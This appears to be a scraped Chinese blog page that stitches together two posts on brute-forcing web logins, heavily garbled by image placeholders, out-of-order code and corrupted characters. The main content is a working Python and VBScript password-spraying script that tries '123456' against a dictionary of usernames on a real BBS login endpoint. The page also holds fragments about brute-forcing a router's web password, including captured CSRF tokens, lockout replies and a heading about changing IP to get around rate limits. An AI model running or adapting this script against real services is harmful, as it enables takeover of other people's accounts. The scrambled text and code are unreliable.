Python牛刀小试密码爆破

图片 1

复制代码 代码如下:

image

#coding: gbk
import httplib, urllib

图片 2

顺手也写了个VBS版的,感觉相似VBS比较快,感觉出题目了?

开拓web登录页面,查看源代码,找找算法

for i in open(“English.Dic”):
if Check(i.rstrip(),”123456″):
print i

图片 3

Dim fso
Set fso = CreateObject(“scripting.filesystemobject”)
With fso.OpenTextFile(“English.Dic”,1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,”123456″) Then
WScript.Echo id & vbTab &”OK”
End If
Loop
End With

流程

Function Check(username,password)
Dim http
Set http = CreateObject(“Msxml2.XMLHTTP”)
http.open _
“POST”,”https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
“Content-Type”,”application/x-www-form-urlencoded”
http.send “userid=” & username & “&passwd=” & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,”密码不得法”) Then
Check = False
ElseIf InStr(response,”不存在那么些用户”) Then
Check = False
Else
Check = True
End If
End Function

image

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject(“adodb.stream”)
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = “gb2312”
AnsiToUnicode = ado.ReadText
End Function

图片 4

事实评释,12345陆真是3个强硬的密码。但愿早晨平素不警察大伯敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

抓包

http://www.bkjia.com/Pythonjc/306570.htmlwww.bkjia.comtruehttp://www.bkjia.com/Pythonjc/306570.htmlTechArticle难道真的要我破解一个么?算了,正好试试我的Python水平。
python版 复制代码 代码如下: #coding: gbk import httplib, urllib def
Check(username, password)…

图片 5

def Check(username, password):
params = urllib.urlencode(
{‘userid’: username, ‘passwd’: password})
headers = {“Content-type”:
“application/x-www-form-urlencoded”}
conn = httplib.HTTPSConnection(“www.bdwm.net”)
conn.request(“POST”,
“/bbs/bbslog2.php”, params, headers)
res = conn.getresponse().read()
conn.close()
if res.find(“密码不正确”) != -1:
return False
elif res.find(“不设有这些用户”) != -1:
return False
else:
return True

剖析进程

难道说真的要本人破解3个么?算了,正好试试笔者的Python水平。
python版

会博得csrf和cookie和所急需的值,那个值都要保存下去,前面会用。

复制代码 代码如下:

图片 6

2、输入用户名密码后:

image

image

image

图片 7

image

在庭院里面来看了一个没人用的路由器(ws860s),看起来像个黑科学技术的玩意儿,就想着进去看看,到底有哪些好玩的。看到后头的价签上有web界面包车型地铁地址,然后登陆进去看看,发现有密码,然后本人想,路由器的密码应该都以足以reset的,然后自身就用笔戳那么些reset键,神蹟未有发生,原来这一个reset键坏了。

图片 8

从上边抓包的结果来看,Password字段是因而加密的,所以如若我们要Python暴力破解,必要把那么些password的变动算法找出来。

[password:bbbbbbbb];{“errorCategory”:”user_pass_err”,”csrf_param”:”FcnG919l8J7XhQsOYQEMS3WhsC2liSX”,”count”:2,”csrf_token”:”IQ/LfSZSx7gTp6VflYnZelobNSpoMy2″}

image

image

image

image

图片 9

image

图片 10

image

image

image

图片 11

image

图片 12

怎么防备暴力破解?

image

image

签到成功的唤起:

有着的数码都准备好了,下一步,正是始于运用Python写程序了。

****[password:xxxxxxxx];{“csrf_param”:”H/DyWxogz7+2y4UfzhqddowkjH1uL04″,”csrf_token”:”MorgBb0+PNpoE8KhwBwq4OoioD2NcCs”,”errorCategory”:”ok”,”level”:2,”IsWizard”:true,”IsFirst”:true}

图片 13

image

图片 14

image

在linux上改动ip地址,非常粗略一条命令就可以缓解:

图片 15

image

密码的变通方法

图片 16

图片 17

image

image

图片 18

图片 19

图片 20

ip地址被限定,须求等待1分钟的唤醒:

image

图片 21

image

图片 22

image

图片 23

image

图片 24

image

一、打开路由的web页面:1玖二.168.三.1,路由器再次来到

image

3、路由器重回数据

[password:aaaaaaaa];{“errorCategory”:”Three_time_err”,”csrf_param”:”VKGTylVILQA9SFsTyYdpkHv8qfJPIIw”,”count”:3,”csrf_token”:”MTQLBcWQN+1DJjAP+A6xC4AUSXciBod”}

图片 25

图片 26

核心Python代码:

图片 27

图片 28

image

图片 29

image

图片 30

image

图片 31

image

image

图片 32

图片 33

图片 34

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图